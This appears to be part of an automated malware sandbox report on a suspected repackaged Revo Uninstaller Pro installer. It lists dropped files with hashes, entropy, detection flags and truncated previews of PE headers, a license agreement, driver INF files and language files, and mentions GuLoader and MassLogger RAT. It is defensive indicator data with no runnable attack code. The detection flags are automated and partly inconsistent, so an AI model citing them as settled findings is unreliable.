37f463bf4616ecd445d4a1937da06e19 | REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exe | malicious | GuLoader, MassLogger RAT
37f463bf4616ecd445d4a1937da06e19 | cllmxIZWcQ.lnk | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe | malicious | Unknown
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe | malicious | Unknown
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe | malicious | Unknown
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe | malicious | Unknown
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Non-ISO extended-ASCII text, with very long lines (793), with CRLF line terminators
Category:dropped
Size (bytes):5590
Entropy (8bit):5.036330960659774
Encrypted:false
SSDEEP:96:ehs4nT03+Pq7sWchbo1Z18HOfMyLGt5aYbCMKgMbl5KTp9P3Rz3lwemW3bk:8HAEq76ubCufst5abLge5KXPJlQQk
MD5:BB9B516486F1A5C2D5AA127355164604
SHA1:712191F838CD5E95F5EC9A32ECD937F1B0119182
SHA-256:0BDF49709C28EDEF8257F7FCB902314181C4FC66C8C3190EB55A30105487A9AC
SHA-512:B29747BEDBC3B14E315FA216CE5ABEB222C354FA6A96055963666EFA3EAD39BF85DF2AB29015EFCB673503337B3BAA255D9AC396C0A503EA6F61B53198671EE8
Malicious:false
Preview:REVO UNINSTALLER PRO LICENSE AGREEMENT AND COPYRIGHT..========================....IMPORTANT: YOU SHOULD CAREFULLY READ THE FOLLOWING LICENSE AGREEMENT. IT WILL BE NECESSARY FOR YOU TO AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BEFORE BEING PERMITTED TO CONTINUE TO INSTALL THE PRODUCT.....This license Agreement is a legal agreement between You (either personal or corporate) and VS REVO GROUP, the developer of the SOFTWARE .Revo Uninstaller Pro.". "VS REVO GROUP" means the developer of the "Revo Uninstaller Pro" software product, VS Revo Group, Ltd. SOFTWARE means Revo Uninstaller Pro product and related explanatory materials. The term "SOFTWARE" also shall include any upgrades, modified versions or updates of the Software licensed to You by VS REVO GROUP.....YOU AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE AGREEMENT AND THE LIMITATIONS OF YOUR LICENSE BY INSTALLING, COPYING, DISTRIBUTING OR OTHERWISE USING the SOFTWARE. IF YOU DO NOT AGREE, DO NOT INSTALL, DISTRIBUTE OR USE REVO
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):191968
Entropy (8bit):6.198794572117837
Encrypted:false
SSDEEP:3072:7G5lIaj6Zx5+hKTTn6115xx/Nl19oyUBlBN0AZHVf+3S484:7uSDXb67bPng1G1
MD5:8B9964E06195FD375D126B424E236F03
SHA1:6F1741CFEB9FB70C34857DBBA3E063C88C3C32FA
SHA-256:BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
SHA-512:741019523B4C5F4EF9A7952172309B2D304A84CBD98FFF99A719105CC1938157EDB1691554A21B9DCD2B523C0F1AB0D37879DEEFC3B2FA5579C0D8C76CADE483
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious
• Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........y.uj*.uj*.uj*3.*.uj*3.*.uj*3.*.uj*.+i+.uj*.+o+.uj*.+n+.uj*b,o+.uj*...*.uj*...*.uj*...*.uj*.uk*&uj*.+n+.uj*.+o+.uj*.+j+.uj*.+.*.uj*.u.*.uj*.+h+.uj*Rich.uj*........PE..d....Jb.........." .....v...P.......{.......................................0......./.... .........................................pS.......T...........3...............5... ..,...0%..T...................(&..(....%...............................................text...8t.......v.................. ..`.rdata...............z..............@..@.data....!...p.......N..............@....pdata...............^..............@..@.gfids...............x..............@..@.tls.................z..............@....rsrc....3.......4...|..............@..@.reloc..,.... ......................@..B........................................................................................................................
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PDF document, version 1.7, 77 pages
Category:dropped
Size (bytes):2172747
Entropy (8bit):7.967339088421113
Encrypted:false
SSDEEP:49152:mjdEod4PD0ZuCBbVRBJHRn/kqZebFV46kT0Tw7AKlPm+JRJ:mZEo2DU1f98qZebFV4gT+R1muJ
MD5:7012BC3336963CBF739BDB61C2226041
SHA1:28D5BD206674B796AD22975E0023ADAFF074E163
SHA-256:AA262DB5124FAD214251F81DFA44C19638B785D0E21C395DFDBCB91C37C3376F
SHA-512:004E612C761C91509320983FCEE6F5B0E58136F686874DDAD39937611E6FF76111350B5D3EBA44FE7AF49E71000695B1773AA831731CEB08EDDBE37C0B70386C
Malicious:false
Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(bg) /Metadata 383 0 R/ViewerPreferences 384 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 77/Kids[ 3 0 R 20 0 R 39 0 R 47 0 R 49 0 R 50 0 R 51 0 R 53 0 R 54 0 R 57 0 R 59 0 R 61 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 69 0 R 71 0 R 73 0 R 74 0 R 76 0 R 79 0 R 81 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 92 0 R 94 0 R 95 0 R 97 0 R 98 0 R 99 0 R 101 0 R 102 0 R 103 0 R 105 0 R 106 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 134 0 R 135 0 R 136 0 R 137 0 R 322 0 R 325 0 R 329 0 R 333 0 R 335 0 R 340 0 R 345 0 R 347 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</ExtGState<</GS5 5 0 R/GS8 8 0 R>>/Font<</F1 6 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Gr
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):9794808
                                                                                                                                                                          Entropy (8bit):6.9007098668528695
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:3dq5HiSQHu3a6F3+3gqVCnNqNt2A0p/5chEuuZkJaC:3dqtNk6UbhbaC
                                                                                                                                                                          MD5:D94CAA2ACB6EBAB90BF564AC6BFC1F05
                                                                                                                                                                          SHA1:965B4E3D1CF653ABC9C68736E5240FA3B50C2C46
                                                                                                                                                                          SHA-256:DB8B4EB11D18FD1DB9342DFC0155069289A4B0E6A9DF69520463F1224BC51C91
                                                                                                                                                                          SHA-512:3B24C4351177473D2BFD1CC4488EA9A5A5AEC2BB41801E70B4ACEFCE24C221B10CD491884CD1AA353D71365798FDEE11852F96813AD4468F7BE05787F1DB0AF3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious
                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........w.............xL......xL..y...xL......[.......).........t.......w......................................b.........^...[.......^..............[.......Rich............PE..d...'..d..........#.......3..tb.....,H.........@.......................................... ...................................................F.......L...I...H..R...4...@............?.p.....................?.(.....?...............3.@............................text.....3.......3................. ..`.rdata.......3.......3.............@..@.data...@<...`F..N...FF.............@....pdata...R....H..T....G.............@..@.gfids..0.....K.......I.............@..@.giats........L.......K.............@..@.tls..........L.......K.............@....rsrc.....I...L...I...K.............@..@........................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):190640
                                                                                                                                                                          Entropy (8bit):6.421539474136109
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:OxneIw3rR+YT5J1zOpXJ5IevXr480/wqqpotGcGe9Nbms:OxBm9vOtr7r48Ct7x
                                                                                                                                                                          MD5:470F2FEABF6AD0A0EEDB02B02AD4C6E8
                                                                                                                                                                          SHA1:100887FC63BF34CAE420FFEED51900426B300CF7
                                                                                                                                                                          SHA-256:78288F4C89D635D0E213F3D2B9BD36D1EE4574CCFBA23E86BD900C7457E48318
                                                                                                                                                                          SHA-512:4FFD8CB2EB8AAE6CE50727937FE759D6CA70D125427FAC512C8DD5B7BF4F60D3EE92B3C5ABE14C1F1C4B4CBEA04F8217D3A4B075A510355A05299191089EA19D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.&..wH..wH..wH....wH....wH....wH.<)K..wH.<)L..wH.<)M.!wH.....wH..wI.cwH..)A..wH..)...wH..)J..wH.Rich.wH.........PE..d......g..........".................$s.........@..........................................`..................................................w..P...............x........J......\....N..p...........................`O...............................................text............................... ..`.rdata..............................@..@.data................l..............@....pdata..x............x..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25604296
                                                                                                                                                                          Entropy (8bit):6.723595463931162
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:D8pA5h1COpxhZwpArAfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIh:gpA5h1nrhIAbFhlqPWpyR1pV
                                                                                                                                                                          MD5:5E2DAB5ED4703B7FA05508A82FB89D69
                                                                                                                                                                          SHA1:DA4616D9FD7245BF0410291B90D4C72215159F0B
                                                                                                                                                                          SHA-256:84EC9BC4133175E6E1DB997E650F53EF14448119F5B1FDFF8ED84F1B4DC5FEDD
                                                                                                                                                                          SHA-512:FE42EA532F58D55FB7ACC53B2B8322F8B60E30EDE050032399E8D3F2AEE1F2967B46863557547E267D6AA52DCE14FA2694F306697CE9C0660BEF898F985DFFCF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iy)@.).Iz)}.)..(C.)..(e.)...(V.).I{)..).I|)G.).uO)V.)o..(..)o..(X.)o..(..).Ig)i.)T.)..)..(..).w)U.)T..)U.)..(U.)RichT.)........................PE..d....JMg..........#.........\.......1Q........@.....................................R.... .....................................................0...............|....f...J..............p.......................(....................................................text...j......................... ..`.rdata...s3......t3................@..@.data........p.......L..............@....pdata..|...........................@..@.gfids..,...........................@..@.giats..............................@..@.tls................................@....rsrc...............................@..@........................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25576112
                                                                                                                                                                          Entropy (8bit):6.723822651268559
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:pTOgY7cLQJlZxfRRHfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIIj:pPY7WQJlvf4FhlqPWpyR1pVk
                                                                                                                                                                          MD5:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          SHA1:FA6FDE156D571986B6DFD94C290DAA80A75E8020
                                                                                                                                                                          SHA-256:9652F60DE7AE4AA0970578974B1886E17A0CE7B6B68BA0F3E713B34EC3636071
                                                                                                                                                                          SHA-512:7EFDA209EE106A26B40858040AEF9A1FC389284A1B171C9729EDBF0005E213AD536850AFCFC66083A81D724E52B50833E1E5CE2AA1CC108CAFA7E8CC9B331ED8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iu)@.).Iv)}.)..(C.)..(e.)...(V.).Iw)..).Ip)G.).uC)V.)o..(..)o..(X.)o..(..).Ik)i.)T.)..)..(..).{)U.)T..)U.)..(U.)RichT.)........PE..d....IMg..........#......R...n........P........@.......................................... .....................................................0....P..........t........J..........@9..p...................H:..(....9...............p...............................text...jQ.......R.................. ..`.rdata..,~3..p....3..V..............@..@.data...x.........................@....pdata..t...........................@..@.gfids..,....`.......n..............@..@.giats.......0.......6..............@..@.tls.........@.......8..............@....rsrc........P.......:..............@..@........................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):179964
                                                                                                                                                                          Entropy (8bit):6.986303683816821
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:H5+pMHMfwXZawAuYNvCLBowkvWei9tL5KYps9/1Kj/9aG2l50:H5+p9wXMBgmvhctWrG
                                                                                                                                                                          MD5:18011FE26C01E02E939389868CB6B771
                                                                                                                                                                          SHA1:8FF97E84AD54A9279B908D5C66DA34736AD85541
                                                                                                                                                                          SHA-256:B370F4BFD94F61776FC84CF617EDB644C9ADDF4B02B0DAF14926A95D68FA7C11
                                                                                                                                                                          SHA-512:9051C26D30EE2B34359FF6508835508032D1434BD8596FD69ADBB73738829BCB2DA07ED03BFA10F2A07E654E43BD7C62E908372915EECAFAC6B2C585A6241829
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@..........................@............@.........................................................................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):40240
                                                                                                                                                                          Entropy (8bit):6.679041686686874
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:5UKM0N2alRO3gpeBJNUG+ML1naP6IXW0hzbhL7bCEMmo2ocAhu:DX+RtTL1naP6IzbhjCEDo2/Ahu
                                                                                                                                                                          MD5:498C3D4D44382A96812A0E0FF28D575B
                                                                                                                                                                          SHA1:C34586B789CA5FE4336AB23AD6FF6EEB991C9612
                                                                                                                                                                          SHA-256:23CB784547268CF775636B07CAC4C00B962FD10A7F9144D5D5886A9166919BBA
                                                                                                                                                                          SHA-512:CE450128E9CA1675EAB8AA734DC907DFC55F3DACD62503339080D6BD47B2523D063786DBE28E6833DB041F1D5869670BE2411A39C7B8D93D05A98B4C09CAD1A1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..x...x...x...x...H..._u..}..._u..z...q.~.z...q.h.y..._u..{...q.t.{...q.i.y...q.l.y...Richx...........................PE..d...5.;K.........."......N..........................................................u...........................................................<............p.......b..0;...... ....Q...............................................P...............................text...;6.......8.................. ..h.rdata.......P.......<..............@..H.data...X....`.......B..............@....pdata.......p.......D..............@..HPAGE.................F.............. ..`INIT....v............N.............. ....rsrc................\..............@..B.reloc..z............`..............@..B........................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (606), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):111866
                                                                                                                                                                          Entropy (8bit):3.472213776386747
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loS7XtdYZqA5IIsJ4FC3P7EHjz7yhYe3w67kiG2ShuJVf6:Fbtnd2m0s6
                                                                                                                                                                          MD5:A911C2F3BDA6270E6D66F26F41094C9F
                                                                                                                                                                          SHA1:EAEA65B48486E81C369AE6C5185C66A5E901511C
                                                                                                                                                                          SHA-256:81B0F02756D39A5772C70AD0F0A85D4091A9C53F72DC8F69FF1738B3CC05F964
                                                                                                                                                                          SHA-512:67455DA740703FA81CA7D042C4ECB57B19DAC985C0D39E82A4539AF5E536A20A57E6B47A1651385FFE1C36DC5D0A53D11538661E7BEBB13D719D35F52F858B29
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.e.s.t.i./.E.s.t.o.n.i.a.n.....W.e.b.L.a.n.g.=.E.S.T.....T.r.a.n.s.l.a.t.o.r.=.t.u.d.i.l.u.d.i. .-. .t.u.d.i.l.u.d.i...e.s.t.o.n.i.a.@.m.a.i.l...e.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...3...8.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.a.a.d.e.....1.0.3. .=. .S.u.v.a.n.d.i.d.....1.0.4. .=. .E.e.m.a.l.d.a.j.a.....1.0.5. .=. .T.....r.i.i.s.t.a.d.....1.0.6. .=. .J...l.i.t.a.j.a. .r.e.~.i.i.m.....1.0.7. .=. .N.i.m.e.k.i.r.i.....1.0.8. .=. .I.k.o.o.n.i.d.....1.0.9. .=. .D.e.t.a.i.l.i.d.....1.1.0. .=. .E.e.m.a.l.d.a.....1.1.1. .=. .K.u.s.t.u.t.a. .s.i.s.s.e.k.a.n.n.e.....1.1.2. .=. .V...r.s.k.e.n.d.a.....1.1.3. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.t. .s.o.o.v.i.d. .v.a.l.i.t.u.d. .s.i.s.s.e.k.a.n.d.e. .k.u.s.t.u.t.a.d.a.?.....1.1.4. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107284
                                                                                                                                                                          Entropy (8bit):3.4850832386228205
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:LqsTLW4zJl0dBdBN86bz6M+fnZPjJPvY/:WIq
                                                                                                                                                                          MD5:6D908FC7ABF104D6F8D6DE6741DBD279
                                                                                                                                                                          SHA1:3771939E5D0F6DE53F1E07691DCB2A4AC70041F2
                                                                                                                                                                          SHA-256:3A99D61A738A7CF3D80581B731FF9070F31CBFB046EC9DE7CBC5C06B76EFA89D
                                                                                                                                                                          SHA-512:1A75B6FDB923281FF66EC33E3872F27BF3E928006D18D6C987951AE4AC02CC06DBF15CDBEF15B94152698FCB1E0DF1D85A7BE7DF73D72C9E83B23D049E182ECF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.D.o.k.u.m.e.n.t.i. .i. .g.j.u.h.e.s. .i. .R.e.v.o. .U.n.i.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....;.T.r.a.n.s.l.a.t.e.d. .b.y. .K.l.a.u.s. .V.e.l.i.u.....;.C.o.n.t.a.c.t. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.h.q.i.p./.A.l.b.a.n.i.a.n.....W.e.b.L.a.n.g.=.A.L.....T.r.a.n.s.l.a.t.o.r.=.K.l.a.u.s. .V.e.l.i.u. .e.-.m.a.i.l.:. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.............[...i.n.s.t.a.l.u.e.s.i. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.a.m.j.a.....1.0.3. .=. .O.p.s.i.o.n.e.t.....1.0.4. .=. ...i.n.s.t.a.l.u.e.s.i.....1.0.5. .=. .M.j.e.t.e.t.....1.0.6. .=. .M.e.n.y.r.a. .e. .g.j.u.e.t.a.r.i.t.....1.0.7. .=. .M.e. .l.i.s.t.i.m.....1.0.8. .=. .M.e. .i.n.k.o.n.a.....1.0.9. .=. .M.e. .d.e.t.a.j.e.....1.1.0. .=. ...i.n.s.t.a.l.o.....1.1.1. .=. .H.i.q. .s.h.e.n.i.m.i.n.....1.1.2. .=. .R.i.f.r.e.s.k.o.....1.1.3. .=. .J.e.n.i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (608), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):116810
                                                                                                                                                                          Entropy (8bit):3.9166739452051953
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lo/tNe5HzHBOyv7EyqyYjNE7TA4s32rELViqKcc+QTMsUbpUpTk+e7WiBYMUZAj3:tqAEFycUTALVeLKSu+Y9v0OQQERYJ
                                                                                                                                                                          MD5:74FBABDEFEF9CEA6BE1B41CAF6941C15
                                                                                                                                                                          SHA1:FE53FEA79D8B382B6B4915E42FC6C0C7B0D6EBAC
                                                                                                                                                                          SHA-256:A42CBA216AABAAF3272FA6715D16543CDB9F9C008C3F82520DE74F2BB5BCD3A4
                                                                                                                                                                          SHA-512:2760A317C6BE76291D94687E3E53AD28FF748338A49DBD381BD386FF798AFFFD09301DF5D81087D744F8773C736E4B19F4397794B555CB096B585B2DF9155062
                                                                                                                                                                          Malicious:false
